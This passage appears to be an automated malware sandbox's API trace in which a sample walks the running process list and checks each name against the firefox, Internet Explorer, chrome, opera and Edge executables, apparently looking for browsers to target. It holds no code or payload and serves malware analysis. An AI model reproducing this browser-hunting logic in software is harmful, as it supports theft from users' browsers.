szExeFile="spoolsv.exe")) returned 1 [0235.982] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0235.982] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0235.982] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0235.982] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0235.982] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.982] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0235.982] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0235.982] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0235.982] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0235.982] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0235.983] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.983] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.983] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0235.983] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0235.983] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0235.983] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0235.983] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.983] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0235.984] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0235.984] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0235.984] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0235.984] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0235.984] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.984] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0235.984] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0235.984] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0235.984] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0235.984] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0235.984] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0235.984] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0235.985] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0235.985] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0235.985] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0235.985] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0235.985] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0235.985] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0235.985] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0235.985] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0235.985] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0235.985] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0235.985] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.986] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0235.986] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0235.986] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0235.986] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0235.986] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0235.986] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0235.986] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0235.987] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0235.987] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0235.987] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0235.987] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0235.987] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0235.987] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0235.987] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0235.987] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0235.987] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0235.987] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0235.987] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.987] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0235.988] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0235.988] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0235.988] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0235.988] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0235.988] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.988] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0235.988] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0235.988] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0235.988] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0235.988] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0235.988] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.988] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0235.989] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0235.989] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0235.989] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0235.989] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0235.989] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.989] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0235.990] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0235.990] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0235.990] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0235.990] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0235.990] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0235.990] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0235.990] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0235.990] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0235.990] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0235.990] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0235.990] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.990] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0235.991] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0235.991] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0235.991] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0235.991] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0235.991] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.991] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0235.991] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0235.991] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0235.991] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0235.991] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0235.991] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.991] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0235.992] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0235.992] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0235.992] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0235.992] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0235.992] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.992] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0235.993] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0235.993] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0235.993] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0235.993] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0235.993] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.993] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0235.993] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0235.993] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0235.993] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0235.993] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0235.993] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0235.993] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0235.994] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0235.994] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0235.994] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0235.994] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0235.994] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0235.994] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0235.994] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0235.994] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0235.994] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0235.994] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0235.994] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0235.994] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0235.995] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0235.995] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0235.995] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0235.995] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0235.995] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.995] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0235.996] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0235.996] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0235.996] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0235.996] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0235.996] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0235.996] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0235.996] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0235.996] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0235.996] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0235.996] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0235.996] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.996] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0235.997] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0235.997] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0235.997] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0235.997] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0235.997] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.997] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.997] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0235.997] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0235.997] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0235.997] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0235.997] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.997] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0235.998] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0235.998] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0235.998] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0235.998] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0235.998] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.998] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.999] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0235.999] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0235.999] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0235.999] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0235.999] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.999] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0235.999] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0235.999] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0235.999] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0235.999] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0235.999] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.999] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0236.000] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0236.000] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0236.000] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0236.000] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0236.000] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0236.000] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0236.000] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0236.000] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0236.000] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0236.000] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0236.000] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0236.000] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0236.001] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0236.001] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0236.001] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0236.001] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0236.001] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0236.001] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0236.002] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0236.002] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0236.002] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0236.002] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0236.002] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0236.002] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0236.002] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0236.002] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0236.002] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0236.002] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0236.002] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0236.002] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0236.003] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0236.003] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0236.003] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0236.003] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0236.003] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0236.003] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0236.003] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0236.003] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0236.003] lstrcmpiA 